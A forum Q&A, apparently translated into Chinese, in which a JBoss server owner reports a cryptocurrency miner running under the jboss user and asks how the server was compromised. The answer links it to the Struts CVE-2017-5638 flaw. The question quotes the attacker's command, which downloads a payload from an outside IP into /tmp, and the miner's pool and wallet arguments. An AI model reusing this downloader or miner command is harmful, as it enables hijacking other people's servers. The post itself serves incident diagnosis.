JBoss AS 7.1.0 最终可能的安全问题

Question

最近几天，我在我的服务器上发现了一个可疑的正在运行的进程。

jboss    23276  0.0  0.0 113108   644 ?        S    04:25   0:00 /bin/bash -c cd /tmp; rm yam; pkill -9 yam; pkill -9 minergate-cli;curl -ks http://107.155.106.174/t/5tf-1478613950.txt > yam || (wget https://107.155.106.174/t/5tf-1478613950.txt --no-check-certifica
jboss    23277  374  0.1 424456 35600 ?        Sl   04:25 2880:22 ./yam --mining-params xmr:av=0&donation-interval=50 -c x -M stratum+tcp://dxzgadfgsdfgsdfgsdfgsdfgwerjukQdysdddRFch2CGykmqWUJPJW2hf23AaJWXmEPe96xYyYVDGn7qN:x@xmr-usa.dwarfpool.com:9050/

我在互联网上搜索，似乎有人正在使用我的服务器作为比特币挖掘的计算节点。所以有人设法在我的服务器上上传并运行它。据我所知，无法访问密码，只能在 Linux 用户 jboss 上执行此操作，并且我的 jboss 应用程序也在此用户下运行。

作为一个快速的解决方案，我在 tmp 文件夹中创建了一个与 root 同名的文件，因此它无法覆盖它。而且我正在运行一个脚本来每分钟检查一个包含这些进程参数的进程是否正在运行。

我想找到这个问题的根源。 jboss 管理控制台已停用。

顺便说一句：我的服务器运行 Centos 7 和 java 版本“1.7.0_79”。

Answer 1

可能您遇到的问题与我们在服务器上遇到的问题相同。

这是关于 Apache Struts 中的漏洞，请查看 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 和 https://cwiki.apache.org/confluence/display/WW/S2-045

在我们的案例中，有人正在挖掘并尝试获取有关操作系统的一些信息（SSH 版本、操作系统系列、用户...）。幸运的是，我们在专用帐户下运行应用程序，没有任何公共访问端口（攻击滥用代理应用程序）。但是您应该检查一些日志并查看一些“multipart/form-data”（在我们的例子中）

grep -r -ni 'multipart/form-data'